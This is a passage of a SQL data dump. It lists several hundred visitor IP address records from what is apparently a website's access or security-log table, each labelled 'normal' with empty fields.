114.155','normal','',0,0,0,0,0,'[]'),(2623,'207.148.67.173','normal','',0,0,0,0,0,'[]'),(2624,'51.38.237.45','normal','',0,0,0,0,0,'[]'),(2625,'142.93.132.111','normal','',0,0,0,0,0,'[]'),(2626,'37.218.255.45','normal','',0,0,0,0,0,'[]'),(2627,'139.59.73.237','normal','',0,0,0,0,0,'[]'),(2628,'198.199.81.163','normal','',0,0,0,0,0,'[]'),(2629,'35.231.137.19','normal','',0,0,0,0,0,'[]'),(2630,'213.142.151.223','normal','',0,0,0,0,0,'[]'),(2631,'212.16.164.132','normal','',0,0,0,0,0,'[]'),(2632,'51.83.37.23','normal','',0,0,0,0,0,'[]'),(2633,'173.212.224.141','normal','',0,0,0,0,0,'[]'),(2634,'213.152.161.138','normal','',0,0,0,0,0,'[]'),(2635,'162.241.253.243','normal','',0,0,0,0,0,'[]'),(2636,'46.161.27.153','normal','',0,0,0,0,0,'[]'),(2637,'65.21.232.254','normal','',0,0,0,0,0,'[]'),(2638,'89.108.81.91','normal','',0,0,0,0,0,'[]'),(2639,'114.119.137.195','normal','',0,0,0,0,0,'[]'),(2640,'154.0.175.35','normal','',0,0,0,0,0,'[]'),(2641,'192.30.89.27','normal','',0,0,0,0,0,'[]'),(2642,'167.172.67.151','normal','',0,0,0,0,0,'[]'),(2643,'217.138.252.123','normal','',0,0,0,0,0,'[]'),(2644,'134.19.179.195','normal','',0,0,0,0,0,'[]'),(2645,'85.128.143.142','normal','',0,0,0,0,0,'[]'),(2646,'222.253.96.9','normal','',0,0,0,0,0,'[]'),(2647,'20.206.201.199','normal','',0,0,0,0,0,'[]'),(2648,'213.152.161.118','normal','',0,0,0,0,0,'[]'),(2649,'128.199.80.18','normal','',0,0,0,0,0,'[]'),(2650,'45.162.228.171','normal','',0,0,0,0,0,'[]'),(2651,'54.36.149.51','normal','',0,0,0,0,0,'[]'),(2652,'95.217.109.26','normal','',0,0,0,0,0,'[]'),(2653,'34.73.44.62','normal','',0,0,0,0,0,'[]'),(2654,'51.89.201.226','normal','',0,0,0,0,0,'[]'),(2655,'178.162.209.171','normal','',0,0,0,0,0,'[]'),(2656,'165.22.202.244','normal','',0,0,0,0,0,'[]'),(2657,'152.89.160.131','normal','',0,0,0,0,0,'[]'),(2658,'88.212.236.252','normal','',0,0,0,0,0,'[]'),(2659,'20.117.168.232','normal','',0,0,0,0,0,'[]'),(2660,'213.152.162.10','normal','',0,0,0,0,0,'[]'),(2661,'20.163.84.173','normal','',0,0,0,0,0,'[]'),(2662,'67.23.254.254','normal','',0,0,0,0,0,'[]'),(2663,'156.146.63.153','normal','',0,0,0,0,0,'[]'),(2664,'114.119.132.135','normal','',0,0,0,0,0,'[]'),(2665,'185.189.112.19','normal','',0,0,0,0,0,'[]'),(2666,'35.87.187.169','normal','',0,0,0,0,0,'[]'),(2667,'62.102.148.187','normal','',0,0,0,0,0,'[]'),(2668,'94.23.7.187','normal','',0,0,0,0,0,'[]'),(2669,'194.163.35.152','normal','',0,0,0,0,0,'[]'),(2670,'3.237.41.133','normal','',0,0,0,0,0,'[]'),(2671,'181.177.96.200','normal','',0,0,0,0,0,'[]'),(2672,'113.108.9.38','normal','',0,0,0,0,0,'[]'),(2673,'113.108.9.38','normal','',0,0,0,0,0,'[]'),(2674,'185.106.208.127','normal','',0,0,0,0,0,'[]'),(2675,'59.36.175.46','normal','',0,0,0,0,0,'[]'),(2676,'207.46.13.168','normal','',0,0,0,0,0,'[]'),(2677,'40.77.190.123','normal','',0,0,0,0,0,'[]'),(2678,'88.214.43.118','normal','',0,0,0,0,0,'[]'),(2679,'45.162.229.147','normal','',0,0,0,0,0,'[]'),(2680,'104.196.239.166','normal','',0,0,0,0,0,'[]'),(2681,'213.152.161.170','normal','',0,0,0,0,0,'[]'),(2682,'89.249.74.213','normal','',0,0,0,0,0,'[]'),(2683,'64.227.161.192','normal','',0,0,0,0,0,'[]'),(2684,'20.14.85.110','normal','',0,0,0,0,0,'[]'),(2685,'95.81.81.219','normal','',0,0,0,0,0,'[]'),(2686,'62.102.148.162','normal','',0,0,0,0,0,'[]'),(2687,'103.130.218.150','normal','',0,0,0,0,0,'[]'),(2688,'35.230.56.59','normal','',0,0,0,0,0,'[]'),(2689,'149.28.60.133','normal','',0,0,0,0,0,'[]'),(2690,'151.55.27.71','normal','',0,0,0,0,0,'[]'),(2691,'37.230.186.130','normal','',0,0,0,0,0,'[]'),(2692,'47.90.138.35','normal','',0,0,0,0,0,'[]'),(2693,'20.169.108.57','normal','',0,0,0,0,0,'[]'),(2694,'120.76.135.15','normal','',0,0,0,0,0,'[]'),(2695,'213.152.161.35','normal','',0,0,0,0,0,'[]'),(2696,'82.102.27.195','normal','',0,0,0,0,0,'[]'),(2697,'213.152.161.229','normal','',0,0,0,0,0,'[]'),(2698,'193.37.254.19','normal','',0,0,0,0,0,'[]'),(2699,'213.152.161.40','normal','',0,0,0,0,0,'[]'),(2700,'2.83.85.30','normal','',0,0,0,0,0,'[]'),(2701,'185.189.112.27','normal','',0,0,0,0,0,'[]'),(2702,'154.0.165.146','normal','',0,0,0,0,0,'[]'),(2703,'162.241.203.137','normal','',0,0,0,0,0,'[]'),(2704,'92.205.110.137','normal','',0,0,0,0,0,'[]'),(2705,'207.46.13.122','normal','',0,0,0,0,0,'[]'),(2706,'198.57.247.254','normal','',0,0,0,0,0,'[]'),(2707,'138.128.173.10','normal','',0,0,0,0,0,'[]'),(2708,'184.75.221.35','normal','',0,0,0,0,0,'[]'),(2709,'50.87.216.226','normal','',0,0,0,0,0,'[]'),(2710,'34.73.87.179','normal','',0,0,0,0,0,'[]'),(2711,'208.67.104.40','normal','',0,0,0,0,0,'[]'),(2712,'185.165.118.130','normal','',0,0,0,0,0,'[]'),(2713,'130.44.215.107','normal','',0,0,0,0,0,'[]'),(2714,'130.44.212.108','normal','',0,0,0,0,0,'[]'),(2715,'147.160.184.83','normal','',0,0,0,0,0,'[]'),(2716,'13.76.135.117','normal','',0,0,0,0,0,'[]'),(2717,'184.75.223.211','normal','',0,0,0,0,0,'[]'),(2718,'198.244.85.227','normal','',0,0,0,0,0,'[]'),(2719,'184.75.223.203','normal','',0,0,0,0,0,'[]'),(2720,'114.119.133.67','normal','',0,0,0,0,0,'[]'),(2721,'62.102.148.152','normal','',0,0,0,0,0,'[]'),(2722,'46.161.27.156','normal','',0,0,0,0,0,'[]'),(2723,'35.231.179.43','normal','',0,0,0,0,0,'[]'),(2724,'129.146.200.94','normal','',0,0,0,0,0,'[]'),(2725,'213.152.161.249','normal','',0,0,0,0,0,'[]'),(2726,'173.44.55.179','normal','',0,0,0,0,0,'[]'),(2727,'65.154.226.169','normal','',0,0,0,0,0,'[]'),(2728,'82.102.23.131','normal','',0,0,0,0,0,'[]'),(2729,'213.152.162.104','normal','',0,0,0,0,0,'[]'),(2730,'54.36.149.105','normal','',0,0,0,0,0,'[]'),(2731,'37.120.132.91','normal','',0,0,0,0,0,'[]'),(2732,'141.98.102.243','normal','',0,0,0,0,0,'[]'),(2733,'113.217.254.81','normal','',0,0,0,0,0,'[]'),(2734,'173.252.83.9','normal','',0,0,0,0,0,'[]'),(2735,'173.252.83.19','normal','',0,0,0,0,0,'[]'),(2736,'213.152.162.5','normal','',0,0,0,0,0,'[]'),(2737,'82.102.23.139','normal','',0,0,0,0,0,'[]'),(2738,'146.70.115.139','normal','',0,0,0,0,0,'[]'),(2739,'213.152.161.15','normal','',0,0,0,0,0,'[]'),(2740,'66.249.74.77','normal','',0,0,0,0,0,'[]'),(2741,'184.75.221.180','normal','',0,0,0,0,0,'[]'),(2742,'66.249.74.75','normal','',0,0,0,0,0,'[]'),(2743,'185.191.171.39','normal','',0,0,0,0,0,'[]'),(2744,'185.191.171.3','normal','',0,0,0,0,0,'[]'),(2745,'184.75.221.171','normal','',0,0,0,0,0,'[]'),(2746,'34.79.22.16','normal','',0,0,0,0,0,'[]'),(2747,'14.225.19.86','normal','',0,0,0,0,0,'[]'),(2748,'67.221.205.43','normal','',0,0,0,0,0,'[]'),(2749,'213.152.162.84','normal','',0,0,0,0,0,'[]'),(2750,'199.249.230.32','normal','',0,0,0,0,0,'[]'),(2751,'185.156.175.43','normal','',0,0,0,0,0,'[]'),(2752,'104.196.127.152','normal','',0,0,0,0,0,'[]'),(2753,'213.152.161.5','normal','',0,0,0,0,0,'[]'),(2754,'149.18.50.22','normal','',0,0,0,0,0,'[]'),(2755,'114.119.137.103','normal','',0,0,0,0,0,'[]'),(2756,'185.191.171.23','normal','',0,0,0,0,0,'[]'),(2757,'185.191.171.1','normal','',0,0,0,0,0,'[]'),(2758,'91.207.102.163','normal','',0,0,0,0,0,'[]'),(2759,'62.102.148.166','normal','',0,0,0,0,0,'[]'),(2760,'41.216.188.218','normal','',0,0,0,0,0,'[]'),(2761,'43.205.46.185','normal','',0,0,0,0,0,'[]'),(2762,'37.115.114.47','normal','',0,0,0,0,0,'[]'),(2763,'165.227.195.28','normal','',0,0,0,0,0,'[]'),(2764,'34.148.100.221','normal','',0,0,0,0,0,'[]'),(2765,'114.119.142.37','normal','',0,0,0,0,0,'[]'),(2766,'37.119.208.199','normal','',0,0,0,0,0,'[]'),(2767,'31.172.80.147','normal','',0,0,0,0,0,'[]'),(2768,'59.36.163.204','normal','',0,0,0,0,0,'[]'),(2769,'199.249.230.12','normal','',0,0,0,0,0,'[]'),(2770,'129.80.117.174','normal','',0,0,0,0,0,'[]'),(2771,'34.148.215.112','normal','',0,0,0,0,0,'[]'),(2772,'149.255.58.65','normal','',0,0,0,0,0,'[]'),(2773,'184.94.240.88','normal','',0,0,0,0,0,'[]'),(2774,'54.236.1.13','normal','',0,0,0,0,0,'[]'),(2775,'20.83.147.176','normal','',0,0,0,0,0,'[]'),(2776,'217.160.166.188','normal','',0,0,0,0,0,'[]'),(2777,'186.234.80.121','normal','',0,0,0,0,0,'[]'),(2778,'65.1.110.138','normal','',0,0,0,0,0,'[]'),(2779,'185.191.171.44','normal','',0,0,0,0,0,'[]'),(2780,'185.191.171.16','normal','',0,0,0,0,0,'[]'),(2781,'34.139.143.44','normal','',0,0,0,0,0,'[]'),(2782,'181.214.218.37','normal','',0,0,0,0,0,'[]'),(2783,'68.61.66.229','normal','',0,0,0,0,0,'[]'),(2784,'66.240.236.119','normal','',0,0,0,0,0,'[]'),(2785,'44.197.214.95','normal','',0,0,0,0,0,'[]'),(2786,'54.36.148.230','normal','',0,0,0,0,0,'[]'),(2787,'34.231.240.250','normal','',0,0,0,0,0,'[]'),(2788,'157.245.45.127','normal','',0,0,0,0,0,'[]'),(2789,'40.77.167.96','normal','',0,0,0,0,0,'[]'),(2790,'18.234.27.240','normal','',0,0,0,0,0,'[]'),(2791,'35.192.67.96','normal','',0,0,0,0,0,'[]'),(2792,'23.106.28.236','normal','',0,0,0,0,0,'[]'),(2793,'34.121.108.163','normal','',0,0,0,0,0,'[]'),(2794,'34.71.109.144','normal','',0,0,0,0,0,'[]'),(2795,'184.75.223.195','normal','',0,0,0,0,0,'[]'),(2796,'35.172.136.8','normal','',0,0,0,0,0,'[]'),(2797,'192.99.13.186','normal','',0,0,0,0,0,'[]'),(2798,'34.148.28.115','normal','',0,0,0,0,0,'[]'),(2799,'54.163.49.28','normal','',0,0,0,0,0,'[]'),(2800,'104.248.124.41','normal','',0,0,0,0,0,'[]'),(2801,'44.200.22.88','normal','',0,0,0,0,0,'[]'),(2802,'114.119.138.226','normal','',0,0,0,0,0,'[]'),(2803,'52.87.222.225','normal','',0,0,0,0,0,'[]'),(2804,'54.176.208.90','normal','',0,0,0,0,0,'[]'),(2805,'146.70.61.147','normal','',0,0,0,0,0,'[]'),(2806,'5.255.231.115','normal','',0,0,0,0,0,'[]'),(2807,'64.20.39.18','normal','',0,0,0,0,0,'[]'),(2808,'209.58.173.138','normal','',0,0,0,0,0,'[]'),(2809,'45.10.142.7','normal','',0,0,0,0,0,'[]'),(2810,'34.148.69.238','normal','',0,0,0,0,0,'[]'),(2811,'3.89.60.84','normal','',0,0,0,0,0,'[]'),(2812,'104.254.90.195','normal','',0,0,0,0,0,'[]'),(2813,'95.216.161.115','normal','',0,0,0,0,0,'[]'),(2814,'181.214.218.68','normal','',0,0,0,0,0,'[]'),(2815,'27.115.124.45','normal','',0,0,0,0,0,'[]'),(2816,'62.102.148.164','normal','',0,0,0,0,0,'[]'),(2817,'213.152.186.35','normal','',0,0,0,0,0,'[]'),(2818,'87.222.28.26','normal','',0,0,0,0,0,'[]'),(2819,'114.119.155.154','normal','',0,0,0,0,0,'[]'),(2820,'155.133.142.66','normal','',0,0,0,0,0,'[]'),(2821,'128.199.105.215','normal','',0,0,0,0,0,'[]'),(2822,'1.202.249.94','normal','',0,0,0,0,0,'[]'),(2823,'188.164.193.195','normal','',0,0,0,0,0,'[]'),(2824,'134.19.179.139','normal','',0,0,0,0,0,'[]'),(2825,'51.15.160.148','normal','',0,0,0,0,0,'[]'),(2826,'134.19.179.147','normal','',0,0,0,0,0,'[]'),(2827,'103.159.4.98','normal','',0,0,0,0,0,'[]'),(2828,'34.139.64.117','normal','',0,0,0,0,0,'[]'),(2829,'185.191.171.42','normal','',0,0,0,0,0,'[]'),(2830,'84.39.116.180','normal','',0,0,0,0,0,'[]'),(2831,'54.36.148.242','normal','',0,0,0,0,0,'[]'),(2832,'173.252.95.120','normal','',0,0,0,0,0,'[]'),(2833,'87.250.224.154','normal','',0,0,0,0,0,'[]'),(2834,'213.152.186.163','normal','',0,0,0,0,0,'[]'),(2835,'199.195.254.123','normal','',0,0,0,0,0,'[]'),(2836,'180.211.99.217','normal','',0,0,0,0,0,'[]'),(2837,'104.248.80.191','normal','',0,0,0,0,0,'[]'),(2838,'87.239.23.107','normal','',0,0,0,0,0,'[]'),(2839,'20.239.161.138','normal','',0,0,0,0,0,'[]'),(2840,'198.46.146.101','normal','',0,0,0,0,0,'[]'),(2841,'92.205.10.44','normal','',0,0,0,0,0,'[]'),(2842,'213.136.79.233','normal','',0,0,0,0,0,'[]'),(2843,'68.183.26.89','normal','',0,0,0,0,0,'[]'),(2844,'31.170.166.144','normal','',0,0,0,0,0,'[]'),(2845,'185.107.112.170','normal','',0,0,0,0,0,'[]'),(2846,'217.21.77.162','normal','',0,0,0,0,0,'[]'),(2847,'134.209.206.208','normal','',0,0,0,0,0,'[]'),(2848,'40.77.167.28','normal','',0,0,0,0,0,'[]'),(2849,'217.116.205.56','normal','',0,0,0,0,0,'[]'),(2850,'50.62.177.214','normal','',0,0,0,0,0,'[]'),(2851,'188.166.103.30','normal','',0,0,0,0,0,'[]'),(2852,'185.102.88.47','normal','',0,0,0,0,0,'[]'),(2853,'23.94.61.21','normal','',0,0,0,0,0,'[]'),(2854,'142.93.48.70','normal','',0,0,0,0,0,'[]'),(2855,'51.89.228.130','normal','',0,0,0,0,0,'[]'),(2856,'64.71.32.81','normal','',0,0,0,0,0,'[]'),(2857,'23.230.235.88','normal','',0,0,0,0,0,'[]'),(2858,'23.230.235.146','normal','',0,0,0,0,0,'[]'),(2859,'23.230.235.55','normal','',0,0,0,0,0,'[]'),(2860,'23.230.235.149','normal','',0,0,0,0,0,'[]'),(2861,'23.230.235.210','normal','',0,0,0,0,0,'[]'),(2862,'23.230.235.105','normal','',0,0,0,0,0,'[]'),(2863,'23.230.235.5','normal','',0,0,0,0,0,'[]'),(2864,'23.230.235.79','normal','',0,0,0,0,0,'[]'),(2865,'162.240.60.255','normal','',0,0,0,0,0,'[]'),(2866,'3.111.174.159','normal','',0,0,0,0,0,'[]'),(2867,'104.254.90.243','normal','',0,0,0,0,0,'[]'),(2868,'185.107.113.101','normal','',0,0,0,0,0,'[]'),(2869,'185.123.60.24','normal','',0,0,0,0,0,'[]'),(2870,'185.2.6.12','normal','',0,0,0,0,0,'[]'),(2871,'103.183.112.162','normal','',0,0,0,0,0,'[]'),(2872,'200.9.65.1','normal','',0,0,0,0,0,'[]'),(2873,'43.153.25.22','normal','',0,0,0,0,0,'[]'),(2874,'123.56.5.185','normal','',0,0,0,0,0,'[]'),(2875,'184.168.96.248','normal','',0,0,0,0,0,'[]'),(2876,'103.109.209.136','normal','',0,0,0,0,0,'[]'),(2877,'68.178.228.135','normal','',0,0,0,0,0,'[]'),(2878,'160.153.249.218','normal','',0,0,0,0,0,'[]'),(2879,'162.0.220.27','normal','',0,0,0,0,0,'[]'),(2880,'45.32.113.107','normal','',0,0,0,0,0,'[]'),(2881,'178.128.2.114','normal','',0,0,0,0,0,'[]'),(2882,'81.88.53.33','normal','',0,0,0,0,0,'[]'),(2883,'61.19.125.142','normal','',0,0,0,0,0,'[]'),(2884,'128.199.54.204','normal','',0,0,0,0,0,'[]'),(2885,'103.163.161.146','normal','',0,0,0,0,0,'[]'),(2886,'176.9.113.101','normal','',0,0,0,0,0,'[]'),(2887,'34.148.64.167','normal','',0,0,0,0,0,'[]'),(2888,'64.124.8.25','normal','',0,0,0,0,0,'[]'),(2889,'64.124.8.25','normal','',0,0,0,0,0,'[]'),(2890,'164.46.54.101','normal','',0,0,0,0,0,'[]'),(2891,'160.16.210.199','normal','',0,0,0,0,0,'[]'),(2892,'185.93.165.224','normal','',0,0,0,0,0,'[]'),(2893,'97.74.82.165','normal','',0,0,0,0,0,'[]'),(2894,'109.235.66.248','normal','',0,0,0,0,0,'[]'),(2895,'178.210.84.161','normal','',0,0,0,0,0,'[]'),(2896,'37.251.155.62','normal','',0,0,0,0,0,'[]'),(2897,'54.36.149.70','normal','',0,0,0,0,0,'[]'),(2898,'54.36.148.137','normal','',0,0,0,0,0,'[]'),(2899,'54.36.148.247','normal','',0,0,0,0,0,'[]'),(2900,'54.36.148.147','normal','',0,0,0,0,0,'[]'),(2901,'77.68.64.29','normal','',0,0,0,0,0,'[]'),(2902,'64.227.190.34','normal','',0,0,0,0,0,'[]'),(2903,'82.165.86.16','normal','',0,0,0,0,0,'[]'),(2904,'60.205.227.183','normal','',0,0,0,0,0,'[]'),(2905,'116.202.117.198','normal','',0,0,0,0,0,'[]'),(2906,'194.163.144.53','normal','',0,0,0,0,0,'[]'),(2907,'128.199.195.166','normal','',0,0,0,0,0,'[]'),(2908,'36.92.166.178','normal','',0,0,0,0,0,'[]'),(2909,'54.37.156.2','normal','',0,0,0,0,0,'[]'),(2910,'128.199.147.151','normal','',0,0,0,0,0,'[]'),(2911,'82.165.86.40','normal','',0,0,0,0,0,'[]'),(2912,'139.99.125.19','normal','',0,0,0,0,0,'[]'),(2913,'185.84.108.22','normal','',0,0,0,0,0,'[]'),(2914,'128.127.106.229','normal','',0,0,0,0,0,'[]'),(2915,'51.195.152.172','normal','',0,0,0,0,0,'[]'),(2916,'181.214.218.62','normal','',0,0,0,0,0,'[]'),(2917,'220.85.221.65','normal','',0,0,0,0,0,'[]'),(2918,'165.140.71.65','normal','',0,0,0,0,0,'[]'),(2919,'185.107.113.41','normal','',0,0,0,0,0,'[]'),(2920,'51.77.159.184','normal','',0,0,0,0,0,'[]'),(2921,'74.208.18.17','normal','',0,0,0,0,0,'[]'),(2922,'66.249.64.129','normal','',0,0,0,0,0,'[]'),(2923,'103.8.12.105','normal','',0,0,0,0,0,'[]'),(2924,'203.156.136.113','normal','',0,0,0,0,0,'[]'),(2925,'82.165.88.207','normal','',0,0,0,0,0,'[]'),(2926,'77.73.134.23','normal','',0,0,0,0,0,'[]'),(2927,'64.42.179.67','normal','',0,0,0,0,0,'[]'),(2928,'148.72.61.12','normal','',0,0,0,0,0,'[]'),(2929,'208.109.68.254','normal','',0,0,0,0,0,'[]'),(2930,'103.81.85.56','normal','',0,0,0,0,0,'[]'),(2931,'87.117.247.34','normal','',0,0,0,0,0,'[]'),(2932,'149.210.196.253','normal','',0,0,0,0,0,'[]'),(2933,'168.138.1.42','normal','',0,0,0,0,0,'[]'),(2934,'27.115.124.101','normal','',0,0,0,0,0,'[]'),(2935,'27.115.124.70','normal','',0,0,0,0,0,'[]'),(2936,'34.148.133.121','normal','',0,0,0,0,0,'[]'),(2937,'64.124.8.48','normal','',0,0,0,0,0,'[]'),(2938,'91.234.195.123','normal','',0,0,0,0,0,'[]'),(2939,'130.41.63.236','normal','',0,0,0,0,0,'[]'),(2940,'92.204.239.12','normal','',0,0,0,0,0,'[]'),(2941,'142.93.36.53','normal','',0,0,0,0,0,'[]'),(2942,'45.252.248.52','normal','',0,0,0,0,0,'[]'),(2943,'67.227.159.220','normal','',0,0,0,0,0,'[]'),(2944,'130.193.9.3','normal','',0,0,0,0,0,'[]'),(2945,'23.111.168.178','normal','',0,0,0,0,0,'[]'),(2946,'201.236.28.16','normal','',0,0,0,0,0,'[]'),(2947,'172.105.49.155','normal','',0,0,0,0,0,'[]'),(2948,'204.12.235.139','normal','',0,0,0,0,0,'[]'),(2949,'65.2.119.66','normal','',0,0,0,0,0,'[]'),(2950,'173.252.83.1','normal','',0,0,0,0,0,'[]'),(2951,'173.252.83.7','normal','',0,0,0,0,0,'[]'),(2952,'43.130.72.30','normal','',0,0,0,0,0,'[]'),(2953,'43.130.72.30','normal','',0,0,0,0,0,'[]'),(2954,'207.180.235.153','normal','',0,0,0,0,0,'[]'),(2955,'148.72.232.31','normal','',0,0,0,0,0,'[]'),(2956,'204.93.193.216','normal','',0,0,0,0,0,'[]'),(2957,'72.167.77.106','normal','',0,0,0,0,0,'[]'),(2958,'217.146.69.53','normal','',0,0,0,0,0,'[]'),(2959,'64.124.8.24','normal','',0,0,0,0,0,'[]'),(2960,'82.156.45.135','normal','',0,0,0,0,0,'[]'),(2961,'89.46.107.98','normal','',0,0,0,0,0,'[]'),(2962,'20.106.219.99','normal','',0,0,0,0,0,'[]'),(2963,'82.165.86.198','normal','',0,0,0,0,0,'[]'),(2964,'35.231.1.43','normal','',0,0,0,0,0,'[]'),(2965,'101.200.198.206','normal','',0,0,0,0,0,'[]'),(2966,'185.94.98.209','normal','',0,0,0,0,0,'[]'),(2967,'156.146.63.158','normal','',0,0,0,0,0,'[]'),(2968,'185.83.146.154','normal','',0,0,0,0,0,'[]'),(2969,'185.58.73.254','normal','',0,0,0,0,0,'[]'),(2970,'114.119.135.196','normal','',0,0,0,0,0,'[]'),(2971,'45.143.81.51','normal','',0,0,0,0,0,'[]'),(2972,'185.200.116.219','normal','',0,0,0,0,0,'[]'),(2973,'18.224.25.178','normal','',0,0,0,0,0,'[]'),(2974,'18.224.25.178','normal','',0,0,0,0,0,'[]'),(2975,'18.224.25.178','normal','',0,0,0,0,0,'[]'),(2976,'18.224.25.178','normal','',0,0,0,0,0,'[]'),(2977,'185.107.112.7','normal','',0,0,0,0,0,'[]'),(2978,'47.241.3.166','normal','',0,0,0,0,0,'[]'),(2979,'173.212.223.238','normal','',0,0,0,0,0,'[]'),(2980,'66.33.205.144','normal','',0,0,0,0,0,'[]'),(2981,'177.55.111.11','normal','',0,0,0,0,0,'[]'),(2982,'124.222.194.56','normal','',0,0,0,0,0,'[]'),(2983,'162.212.56.30','normal','',0,0,0,0,0,'[]'),(2984,'211.13.204.1','normal','',0,0,0,0,0,'[]'),(2985,'46.246.106.19','normal','',0,0,0,0,0,'[]'),(2986,'172.241.224.142','normal','',0,0,0,0,0,'[]'),(2987,'185.107.112.126','normal','',0,0,0,0,0,'[]'),(2988,'142.93.56.89','normal','',0,0,0,0,0,'[]'),(2989,'44.228.64.221','normal','',0,0,0,0,0,'[]'),(2990,'45.76.147.0','normal','',0,0,0,0,0,'[]'),(2991,'52.179.81.192','normal','',0,0,0,0,0,'[]'),(2992,'178.128.102.185','normal','',0,0,0,0,0,'[]'),(2993,'136.144.179.78','normal','',0,0,0,0,0,'[]'),(2994,'185.156.175.60','normal','',0,0,0,0,0,'[]'),(2995,'135.181.142.230','normal','',0,0,0,0,0,'[]'),(2996,'34.86.38.165','normal','',0,0,0,0,0,'[]'),(2997,'114.119.141.168','normal','',0,0,0,0,0,'[]'),(2998,'129.226.11.117','normal','',0,0,0,0,0,'[]'),(2999,'173.252.83.116','normal','',0,0,0,0,0,'[]'),(3000,'40.127.3.88','normal','',0,0,0,0,0,'[]'),(3001,'13.67.56.103','normal','',0,0,0,0,0,'[]'),(3002,'103.141.97.27','normal','',0,0,0,0,0,'[]'),(3003,'37.120.132.83','normal','',0,0,0,0,0,'[]'),(3004,'50.62.141.129','normal','',0,0,0,0,0,'[]'),(3005,'185.107.113.160','normal','',0,0,0,0,0,'[]'),(3006,'81.161.229.250','normal','',0,0,0,0,0,'[]'),(3007,'212.102.44.99','normal','',0,0,0,0,0,'[]'),(3008,'18.237.119.198','normal','',0,0,0,0,0,'[]'),(3009,'35.92.78.254','normal','',0,0,0,0,0,'[]'),(3010,'54.203.218.33','normal','',0,0,0,0,0,'[]'),(3011,'35.91.6.45','normal','',0,0,0,0,0,'[]'),(3012,'34.75.126.187','normal','',0,0,0,0,0,'[]'),(3013,'64.124.8.34','normal','',0,0,0,0,0,'[]'),(3014,'167.71.184.141','normal','',0,0,0,0,0,'[]'),(3015,'185.15.198.166','normal','',0,0,0,0,0,'[]'),(3016,'170.249.205.58','normal','',0,0,0,0,0,'[]'),(3017,'179.188.47.107','normal','',0,0,0,0,0,'[]'),(3018,'207.188.157.79','normal','',0,0,0,0,0,'[]'),(3019,'185.191.171.5','normal','',0,0,0,0,0,'[]'),(3020,'62.102.148.154','normal','',0,0,0,0,0,'[]'),(3021,'124.221.205.249','normal','',0,0,0,0,0,'[]'),(3022,'74.208.59.231','normal','',0,0,0,0,0,'[]'),(3023,'198.252.105.20','normal','',0,0,0,0,0,'[]'),(3024,'47.105.130.240','normal','',0,0,0,0,0,'[]'),(3025,'172.94.53.36','normal','',0,0,0,0,0,'[]'),(3026,'37.139.53.30','normal','',0,0,0,0,0,'[]'),(3027,'213.152.187.200','normal','',0,0,0,0,0,'[]'),(3028,'253.58.92.127','normal','',0,0,0,0,0,'[]'),(3029,'150.105.238.59','normal','',0,0,0,0,0,'[]'),(3030,'7.244.7.171','normal','',0,0,0,0,0,'[]'),(3031,'134.215.32.207','normal','',0,0,0,0,0,'[]'),(3032,'198.164.164.43','normal','',0,0,0,0,0,'[]'),(3033,'184.168.114.114','normal','',0,0,0,0,0,'[]'),(3034,'103.117.212.32','normal','',0,0,0,0,0,'[]'),(3035,'92.204.239.68','normal','',0,0,0,0,0,'[]'),(3036,'194.36.111.59','normal','',0,0,0,0,0,'[]'),(3037,'89.46.106.142','normal','',0,0,0,0,0,'[]'),(3038,'66.97.33.13','normal','',0,0,0,0,0,'[]'),(3039,'34.75.248.192','normal','',0,0,0,0,0,'[]'),(3040,'181.214.218.43','normal','',0,0,0,0,0,'[]'),(3041,'205.185.116.156','normal','',0,0,0,0,0,'[]'),(3042,'185.191.171.26','normal','',0,0,0,0,0,'[]'),(3043,'43.239.110.241','normal','',0,0,0,0,0,'[]'),(3044,'146.70.61.131','normal','',0,0,0,0,0,'[]'),(3045,'192.144.198.95','normal','',0,0,0,0,0,'[]'),(3046,'1.117.168.227','normal','',0,0,0,0,0,'[]'),(3047,'178.239.172.7','normal','',0,0,0,0,0,'[]'),(3048,'212.91.94.100','normal','',0,0,0,0,0,'[]'),(3049,'137.74.94.65','normal','',0,0,0,0,0,'[]'),(3050,'34.91.106.237','normal','',0,0,0,0,0,'[]'),(3051,'41.78.241.66','normal','',0,0,0,0,0,'[]'),(3052,'66.249.79.72','normal','',0,0,0,0,0,'[]'),(3053,'205.185.121.252','normal','',0,0,0,0,0,'[]'),(3054,'54.37.160.131','normal','',0,0,0,0,0,'[]'),(3055,'193.141.65.121','normal','',0,0,0,0,0,'[]'),(3056,'89.238.150.43','normal','',0,0,0,0,0,'[]'),(3057,'82.165.87.109','normal','',0,0,0,0,0,'[]'),(3058,'18.140.64.25','normal','',0,0,0,0,0,'[]'),(3059,'223.165.66.70','normal','',0,0,0,0,0,'[]'),(3060,'104.36.141.111','normal','',0,0,0,0,0,'[]'),(3061,'104.36.141.111','normal','',0,0,0,0,0,'[]'),(3062,'62.234.92.73','normal','',0,0,0,0,0,'[]'),(3063,'133.18.25.1','normal','',0,0,0,0,0,'[]'),(3064,'104.37.174.38','normal','',0,0,0,0,0,'[]'),(3065,'85.128.143.33','normal','',0,0,0,0,0,'[]'),(3066,'85.128.143.30','normal','',0,0,0,0,0,'[]'),(3067,'185.156.174.27','normal','',0,0,0,0,0,'[]'),(3068,'49.234.150.132','normal','',0,0,0,0,0,'[]'),(3069,'34.214.98.216','normal','',0,0,0,0,0,'[]'),(3070,'89.163.146.52','normal','',0,0,0,0,0,'[]'),(3071,'195.78.33.115','normal','',0,0,0,0,0,'[]'),(3072,'3.12.55.205','normal','',0,0,0,0,0,'[]'),(3073,'185.191.171.35','normal','',0,0,0,0,0,'[]'),(3074,'82.102.28.107','normal','',0,0,0,0,0,'[]'),(3075,'93.103.221.24','normal','',0,0,0,0,0,'[]'),(3076,'216.158.230.167','normal','',0,0,0,0,0,'[]'),(3077,'86.105.9.67','normal','',0,0,0,0,0,'[]'),(3078,'18.157.74.190','normal','',0,0,0,0,0,'[]'),(3079,'20.19.186.7','normal','',0,0,0,0,0,'[]'),(3080,'5.255.253.125','normal','',0,0,0,0,0,'[]'),(3081,'95.108.213.23','normal','',0,0,0,0,0,'[]'),(3082,'95.108.213.65','normal','',0,0,0,0,0,'[]'),(3083,'52.209.69.158','normal','',0,0,0,0,0,'[]'),(3084,'185.191.171.20','normal','',0,0,0,0,0,'[]'),(3085,'185.191.171.43','normal','',0,0,0,0,0,'[]'),(3086,'46.32.100.33','normal','',0,0,0,0,0,'[]'),(3087,'192.241.137.43','normal','',0,0,0,0,0,'[]'),(3088,'45.55.112.20','normal','',0,0,0,0,0,'[]'),(3089,'161.35.183.194','normal','',0,0,0,0,0,'[]'),(3090,'137.116.131.148','normal','',0,0,0,0,0,'[]'),(